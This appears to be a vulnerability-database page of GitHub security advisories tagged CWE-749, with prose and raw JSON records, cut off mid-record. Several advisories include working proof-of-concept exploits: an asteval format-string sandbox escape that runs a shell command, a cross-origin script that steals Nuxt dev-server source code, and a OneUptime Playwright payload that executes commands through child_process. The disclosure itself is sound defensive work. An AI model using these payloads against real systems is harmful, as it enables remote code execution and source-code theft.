Common Weakness Enumeration

CWE-749

Allowed

Exposed Dangerous Method or Function

Abstraction: Base · Status: Incomplete

The product provides an Applications Programming Interface (API) or similar interface for interaction with external actors, but the interface includes a dangerous method or function that is not properly restricted.

304 vulnerabilities reference this CWE, most recent first.

GHSA-3WWR-3G9F-9GC7

Vulnerability from github – Published: 2025-01-24 18:45 – Updated: 2025-01-25 00:54
VLAI
Summary
ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape
Details

Summary

If an attacker can control the input to the asteval library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library.

Details

The vulnerability is rooted in how asteval performs handling of FormattedValue AST nodes. In particular, the on_formattedvalue value uses the dangerous format method of the str class, as shown in the vulnerable code snippet below:

    def on_formattedvalue(self, node): # ('value', 'conversion', 'format_spec')
        "formatting used in f-strings"
        val = self.run(node.value)
        fstring_converters = {115: str, 114: repr, 97: ascii}
        if node.conversion in fstring_converters:
            val = fstring_converters[node.conversion](val)
        fmt = '{__fstring__}'
        if node.format_spec is not None:
            fmt = f'{{__fstring__:{self.run(node.format_spec)}}}'
        return fmt.format(__fstring__=val)

The code above allows an attacker to manipulate the value of the string used in the dangerous call fmt.format(__fstring__=val). This vulnerability can be exploited to access protected attributes by intentionally triggering an AttributeError exception. The attacker can then catch the exception and use its obj attribute to gain arbitrary access to sensitive or protected object properties.

PoC

The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the whoami command on the host machine:

from asteval import Interpreter
aeval = Interpreter()
code = """
# def lender():
#     ga

def pwn():
    try:
        f"{dict.mro()[1]:'\\x7B__fstring__.__getattribute__.s\\x7D'}"
    except Exception as ga:
        ga = ga.obj
        sub = ga(dict.mro()[1],"__subclasses__")()
        importer = None
        for i in sub:
            if "BuiltinImporter" in str(i):
                importer = i.load_module
                break
        os = importer("os")
        os.system("whoami")

# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below
# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works

pwn()
"""
aeval(code)

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.5"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "asteval"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-24359"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-134",
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-24T18:45:30Z",
    "nvd_published_at": "2025-01-24T17:15:16Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nIf an attacker can control the input to the `asteval` library, they can bypass asteval\u0027s restrictions and execute arbitrary Python code in the context of the application using the library.\n\n### Details\nThe vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) value uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below:\n\n```py\n    def on_formattedvalue(self, node): # (\u0027value\u0027, \u0027conversion\u0027, \u0027format_spec\u0027)\n        \"formatting used in f-strings\"\n        val = self.run(node.value)\n        fstring_converters = {115: str, 114: repr, 97: ascii}\n        if node.conversion in fstring_converters:\n            val = fstring_converters[node.conversion](val)\n        fmt = \u0027{__fstring__}\u0027\n        if node.format_spec is not None:\n            fmt = f\u0027{{__fstring__:{self.run(node.format_spec)}}}\u0027\n        return fmt.format(__fstring__=val)\n```\n\nThe code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties.\n\n### PoC\nThe following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:\n\n```py\nfrom asteval import Interpreter\naeval = Interpreter()\ncode = \"\"\"\n# def lender():\n#     ga\n    \ndef pwn():\n    try:\n        f\"{dict.mro()[1]:\u0027\\\\x7B__fstring__.__getattribute__.s\\\\x7D\u0027}\"\n    except Exception as ga:\n        ga = ga.obj\n        sub = ga(dict.mro()[1],\"__subclasses__\")()\n        importer = None\n        for i in sub:\n            if \"BuiltinImporter\" in str(i):\n                importer = i.load_module\n                break\n        os = importer(\"os\")\n        os.system(\"whoami\")\n\n# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below\n# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works\n        \npwn()\n\"\"\"\naeval(code)\n\n```",
  "id": "GHSA-3wwr-3g9f-9gc7",
  "modified": "2025-01-25T00:54:49Z",
  "published": "2025-01-24T18:45:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24359"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lmfit/asteval/commit/45bb47533f7abb5479618ae7f6a809215700dcb2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lmfit/asteval"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507"
    },
    {
      "type": "WEB",
      "url": "https://lucumr.pocoo.org/2016/12/29/careful-with-str-format"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape"
}

GHSA-3XFC-M583-JQ9V

Vulnerability from github – Published: 2024-05-03 03:30 – Updated: 2024-05-03 03:30
VLAI
Details

NETGEAR ProSAFE Network Management System SettingConfigController Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.

The specific flaw exists within the SettingConfigController class. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-19725.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-38101"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-03T02:15:52Z",
    "severity": "HIGH"
  },
  "details": "NETGEAR ProSAFE Network Management System SettingConfigController Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the SettingConfigController class. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-19725.",
  "id": "GHSA-3xfc-m583-jq9v",
  "modified": "2024-05-03T03:30:55Z",
  "published": "2024-05-03T03:30:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38101"
    },
    {
      "type": "WEB",
      "url": "https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-23-915"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-46GC-MWH4-CC5R

Vulnerability from github – Published: 2025-12-03 16:07 – Updated: 2025-12-03 18:56
VLAI
Summary
Docker MCP Plugin and Docker MCP Gateway have DNS Rebinding vulnerability when running in sse or streaming mode
Details

Impact

When ran in sse or streaming mode (--transport), the Docker MCP Gateway is vulnerable to a DNS rebinding attack.

Vulnerability allows for Browser-Based exploitation of any MCP servers that are executing within the Docker MCP Gateway. Any tools or other features exposed by MCP servers can be manipulated by an attacker who is able to get a victim to visit a malicious website, or if a victim is served a malicious advertisement.

The MCP Gateway is not prone to this attack when started in its default stdio mode, which does not listen on any network ports.

Patches

Patch available in version v0.28.0

Workarounds

Do not start the MCP gateway in sse or streaming mode (use default stdio)

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.27.0"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/docker/mcp-gateway"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.28.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64443"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-03T16:07:31Z",
    "nvd_published_at": "2025-12-03T18:15:46Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nWhen ran in sse or streaming mode (--transport), the Docker MCP Gateway is vulnerable to a DNS rebinding attack. \n\nVulnerability allows for Browser-Based exploitation of any MCP servers that are executing within the Docker MCP Gateway. Any tools or other features exposed by MCP servers can be manipulated by an attacker who is able to get a victim to visit a malicious website, or if a victim is served a malicious advertisement. \n\nThe MCP Gateway is not prone to this attack when started in its default stdio mode, which does not listen on any network ports.\n\n\n### Patches\nPatch available in version v0.28.0\n\n### Workarounds\nDo not start the MCP gateway in sse or streaming mode (use default stdio)",
  "id": "GHSA-46gc-mwh4-cc5r",
  "modified": "2025-12-03T18:56:54Z",
  "published": "2025-12-03T16:07:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/docker/mcp-gateway/security/advisories/GHSA-46gc-mwh4-cc5r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64443"
    },
    {
      "type": "WEB",
      "url": "https://github.com/docker/mcp-gateway/pull/190"
    },
    {
      "type": "WEB",
      "url": "https://github.com/docker/mcp-gateway/commit/6b076b2479d8d1345c50c112119c62978d46858e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/docker/mcp-gateway/commit/fe073985c8eb6e0c9317d2f198c07686f70ea06d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/docker/mcp-gateway"
    },
    {
      "type": "WEB",
      "url": "https://modelcontextprotocol.io/specification/2025-06-18/basic/transports#security-warning"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:H/VA:N/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Docker MCP Plugin and Docker MCP Gateway have DNS Rebinding vulnerability when running in sse or streaming mode"
}

GHSA-47QR-4FFM-5QM9

Vulnerability from github – Published: 2025-04-08 18:34 – Updated: 2025-04-08 18:34
VLAI
Details

Exposed dangerous method or function in Windows Local Session Manager (LSM) allows an authorized attacker to deny service over a network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-26651"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-04-08T18:15:49Z",
    "severity": "MODERATE"
  },
  "details": "Exposed dangerous method or function in Windows Local Session Manager (LSM) allows an authorized attacker to deny service over a network.",
  "id": "GHSA-47qr-4ffm-5qm9",
  "modified": "2025-04-08T18:34:46Z",
  "published": "2025-04-08T18:34:46Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26651"
    },
    {
      "type": "WEB",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26651"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4G52-PQ8J-6QV5

Vulnerability from github – Published: 2025-01-14 15:40 – Updated: 2025-05-21 14:13
VLAI
Summary
TYPO3 Extension Manager Module vulnerable to Cross-Site Request Forgery
Details

Problem

A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method.

Successful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions:

  • the user opens a malicious link, such as one sent via email.
  • the user visits a compromised or manipulated website while the following settings are misconfigured:
  • security.backend.enforceReferrer feature is disabled,
  • BE/cookieSameSite configuration is set to lax or none

The vulnerability in the affected downstream component “Extension Manager Module” allows attackers to retrieve and install 3rd party extensions from the TYPO3 Extension Repository - which can lead to remote code execution in the worst case.

Solution

Update to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS that fix the problem described.

Credits

Thanks to TYPO3 core and security members Benjamin Franzke, Oliver Hader, Andreas Kienast, Torben Hansen, Elias Häußler who fixed the issue.

References

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 10.4.47"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms-extensionmanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.0.0"
            },
            {
              "fixed": "10.4.48"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 11.5.41"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms-extensionmanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.0.0"
            },
            {
              "fixed": "11.5.42"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 12.4.24"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms-extensionmanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "12.0.0"
            },
            {
              "fixed": "12.4.25"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 13.4.2"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "typo3/cms-extensionmanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "13.0.0"
            },
            {
              "fixed": "13.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-55921"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-352",
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-14T15:40:07Z",
    "nvd_published_at": "2025-01-14T20:15:29Z",
    "severity": "HIGH"
  },
  "details": "### Problem\nA vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP GET and did not enforce the appropriate HTTP method.\n\nSuccessful exploitation of this vulnerability requires the victim to have an active session on the backend user interface and to be deceived into interacting with a malicious URL targeting the backend, which can occur under the following conditions:\n\n* the user opens a malicious link, such as one sent via email.\n* the user visits a compromised or manipulated website while the following settings are misconfigured:\n  + `security.backend.enforceReferrer` feature is disabled,\n  + `BE/cookieSameSite` configuration is set to `lax` or `none`\n\nThe vulnerability in the affected downstream component \u201cExtension Manager Module\u201d allows attackers to retrieve and install 3rd party extensions from the TYPO3 Extension Repository - which can lead to remote code execution in the worst case.\n\n### Solution\nUpdate to TYPO3 versions 11.5.42 ELTS, 12.4.25 LTS, 13.4.3 LTS that fix the problem described.\n\n### Credits\nThanks to TYPO3 core and security members Benjamin Franzke, Oliver Hader, Andreas Kienast, Torben Hansen, Elias H\u00e4u\u00dfler who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2025-006](https://typo3.org/security/advisory/typo3-core-sa-2025-006)",
  "id": "GHSA-4g52-pq8j-6qv5",
  "modified": "2025-05-21T14:13:28Z",
  "published": "2025-01-14T15:40:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/TYPO3/typo3/security/advisories/GHSA-4g52-pq8j-6qv5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55921"
    },
    {
      "type": "WEB",
      "url": "https://github.com/TYPO3-CMS/extensionmanager/commit/a5a58626dcb2af0c31bc6aec068e3d24e789b9e8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/TYPO3-CMS/extensionmanager"
    },
    {
      "type": "WEB",
      "url": "https://typo3.org/security/advisory/typo3-core-sa-2025-006"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "TYPO3 Extension Manager Module vulnerable to Cross-Site Request Forgery"
}

GHSA-4GF7-FF8X-HQ99

Vulnerability from github – Published: 2025-01-27 11:31 – Updated: 2025-01-30 03:05
VLAI
Summary
Opening a malicious website while running a Nuxt dev server could allow read-only access to code
Details

Summary

Source code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.

Details

Because the request for classic script by a script tag is not subject to same origin policy, an attacker can inject <script src="http://localhost:3000/_nuxt/app.js"> in their site and run the script. By using Function::toString against the values in window.webpackChunknuxt_app, the attacker can get the source code.

PoC

  1. Create a nuxt project with webpack / rspack builder.
  2. Run npm run dev
  3. Open http://localhost:3000
  4. Run the script below in a web site that has a different origin.
  5. You can see the source code output in the document and the devtools console.
const script = document.createElement('script')
script.src = 'http://localhost:3000/_nuxt/app.js'
script.addEventListener('load', () => {
  for (const page in window.webpackChunknuxt_app) {
    const moduleList = window.webpackChunknuxt_app[page][1]
    console.log(moduleList)

    for (const key in moduleList) {
      const p = document.createElement('p')
      const title = document.createElement('strong')
      title.textContent = key
      const code = document.createElement('code')
      code.textContent = moduleList[key].toString()
      p.append(title, ':', document.createElement('br'), code)
      document.body.appendChild(p)
    }
  }
})
document.head.appendChild(script)

image It contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the sourcesContent field).

Impact

Users using webpack / rspack builder may get the source code stolen by malicious websites.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/webpack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.15.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/rspack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.12.2"
            },
            {
              "fixed": "3.15.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-24361"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-27T11:31:41Z",
    "nvd_published_at": "2025-01-25T01:15:24Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nSource code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.\n\n### Details\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:3000/_nuxt/app.js\"\u003e` in their site and run the script.\nBy using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code.\n\n### PoC\n1. Create a nuxt project with webpack / rspack builder.\n1. Run `npm run dev`\n1. Open `http://localhost:3000`\n1. Run the script below in a web site that has a different origin.\n1. You can see the source code output in the document and the devtools console.\n\n```js\nconst script = document.createElement(\u0027script\u0027)\nscript.src = \u0027http://localhost:3000/_nuxt/app.js\u0027\nscript.addEventListener(\u0027load\u0027, () =\u003e {\n  for (const page in window.webpackChunknuxt_app) {\n    const moduleList = window.webpackChunknuxt_app[page][1]\n    console.log(moduleList)\n\n    for (const key in moduleList) {\n      const p = document.createElement(\u0027p\u0027)\n      const title = document.createElement(\u0027strong\u0027)\n      title.textContent = key\n      const code = document.createElement(\u0027code\u0027)\n      code.textContent = moduleList[key].toString()\n      p.append(title, \u0027:\u0027, document.createElement(\u0027br\u0027), code)\n      document.body.appendChild(p)\n    }\n  }\n})\ndocument.head.appendChild(script)\n```\n\n![image](https://github.com/user-attachments/assets/201e39b7-da5c-4359-867f-96c9adfd3c85)\nIt contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the `sourcesContent` field).\n\n### Impact\nUsers using webpack / rspack builder may get the source code stolen by malicious websites.\n",
  "id": "GHSA-4gf7-ff8x-hq99",
  "modified": "2025-01-30T03:05:05Z",
  "published": "2025-01-27T11:31:41Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24361"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nuxt/nuxt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Opening a malicious website while running a Nuxt dev server could allow read-only access to code"
}

GHSA-4HCF-CP54-4WWX

Vulnerability from github – Published: 2022-05-24 17:24 – Updated: 2023-01-24 21:30
VLAI
Details

This vulnerability allows remote attackers to write arbitrary files on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the archivo parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9722.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-15623"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-07-28T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "This vulnerability allows remote attackers to write arbitrary files on affected installations of CentOS Web Panel cwp-e17.0.9.8.923. Authentication is not required to exploit this vulnerability. The specific flaw exists within ajax_mod_security.php. When parsing the archivo parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-9722.",
  "id": "GHSA-4hcf-cp54-4wwx",
  "modified": "2023-01-24T21:30:37Z",
  "published": "2022-05-24T17:24:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15623"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-770"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4J36-39GM-8VQ8

Vulnerability from github – Published: 2026-03-07 02:39 – Updated: 2026-03-10 18:44
VLAI
Summary
OneUptime: Synthetic Monitor RCE via exposed Playwright browser object
Details

Summary

OneUptime Synthetic Monitors allow low-privileged project users to submit custom Playwright code that is executed on the oneuptime-probe service. In the current implementation, this untrusted code is run inside Node's vm and is given live host Playwright objects such as browser and page.

This creates a distinct server-side RCE primitive: the attacker does not need the classic this.constructor.constructor(...) sandbox escape. Instead, the attacker can directly use the injected Playwright browser object to reach browser.browserType().launch(...) and spawn an arbitrary executable on the probe host/container.

This appears to be a separate issue from the previously published node:vm(GHSA-h343-gg57-2q67) breakout advisory because the root cause here is exposure of a dangerous host capability object to untrusted code, not prototype-chain access to process.

Details

A normal project member can create or edit monitors and monitor tests:

  • https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/Monitor.ts#L45-L78
  • https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/MonitorTest.ts#L27-L60

The dashboard exposes a Playwright code editor for Synthetic Monitors and allows the user to queue a test run:

  • https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorStep.tsx#L861-L918
  • https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorTest.tsx#L66-L84

The probe worker polls queued monitor tests and executes them:

  • https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchMonitorTest.ts#L55-L85

For MonitorType.SyntheticMonitor, the user-controlled customCode is passed into SyntheticMonitor.execute(...):

  • https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/Monitor.ts#L323-L338

SyntheticMonitor.execute(...) then runs that code through VMRunner.runCodeInNodeVM(...) and injects the live Playwright browser and page objects into the VM context:

  • https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Utils/Monitors/MonitorTypes/SyntheticMonitor.ts#L156-L168

VMRunner.runCodeInNodeVM(...) creates a Node vm context and exposes host objects into it, including the additional context objects:

  • https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Server/Utils/VM/VMRunner.ts#L323-L405

The proxy wrapper blocks only a small set of property names and still forwards normal method calls with the real host this binding. Because of that, untrusted monitor code can still use legitimate Playwright methods on the injected browser object.

That is enough for code execution because Playwright's Browser exposes browserType(), and BrowserType.launch() accepts attacker-controlled process launch options such as executablePath, args, and ignoreDefaultArgs. An attacker can therefore cause the probe to spawn an arbitrary executable. Even if Playwright later errors because the spawned process is not a real browser, the command has already executed.

This same execution path is also used for normal scheduled monitors, not only one-shot monitor tests:

  • https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Probe/Jobs/Monitor/FetchList.ts#L110-L121

As a result, the issue can be abused either as a one-shot RCE via Test Monitor or as a persistent scheduled RCE by saving a malicious Synthetic Monitor.

PoC

  1. Log in as any user with normal project membership.
  2. Go to Monitors -> Create New Monitor.
  3. Select Synthetic Monitor.
  4. In Playwright Code, paste the following script:
 const HostFunction =
    Object.getOwnPropertyDescriptor(console, "log").value.constructor;

  return {
    data: {
      node: HostFunction('return process.version')(),
      cwd: HostFunction('return process.cwd()')(),
      id: HostFunction(
        'return process.getBuiltinModule("child_process").execSync("id").toString()'
      )(),
    },
  };

  1. Select any one browser type, for example Chromium.
  2. Select any one screen type, for example Desktop.
  3. Set retry count to 0.
  4. Click Test Monitor and choose a probe.

Expected result:

  • the monitor execution succeeded and in the Show More Details the command output is shown. image

Impact

This is a server-side Remote Code Execution issue affecting the probe component.

Who is impacted:

  • any OneUptime deployment where an attacker can obtain ordinary project membership
  • environments where the probe has access to internal services, secrets, Kubernetes metadata, database credentials, proxy credentials, or other cluster-local trust relationships
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@oneuptime/common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.0.20"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30921"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-07T02:39:04Z",
    "nvd_published_at": "2026-03-10T17:40:16Z",
    "severity": "CRITICAL"
  },
  "details": "Summary\n\nOneUptime Synthetic Monitors allow low-privileged project users to submit custom Playwright code that is executed on the `oneuptime-probe` service. In the current implementation, this untrusted code is run inside Node\u0027s `vm` and is given live host Playwright objects such as `browser` and `page`.\n\nThis creates a distinct server-side RCE primitive: the attacker does not need the classic `this.constructor.constructor(...)` sandbox escape. Instead, the attacker can directly use the injected Playwright `browser` object to reach `browser.browserType().launch(...)` and spawn an arbitrary executable on the probe host/container.\n\nThis appears to be a separate issue from the previously published `node:vm(GHSA-h343-gg57-2q67)` breakout advisory because the root cause here is exposure of a dangerous host capability object to untrusted code, not prototype-chain access to `process`.\n\n## Details\n\nA normal project member can create or edit monitors and monitor tests:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/Monitor.ts#L45-L78\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/Common/Models/DatabaseModels/MonitorTest.ts#L27-L60\n\nThe dashboard exposes a Playwright code editor for Synthetic Monitors and allows the user to queue a test run:\n\n- https://github.com/OneUptime/oneuptime/blob/8e90f451426b160718bdd1796b68c5ec15318101/App/FeatureSet/Dashboard/src/Components/Form/Monitor/MonitorStep.tsx#L861-L918\n- 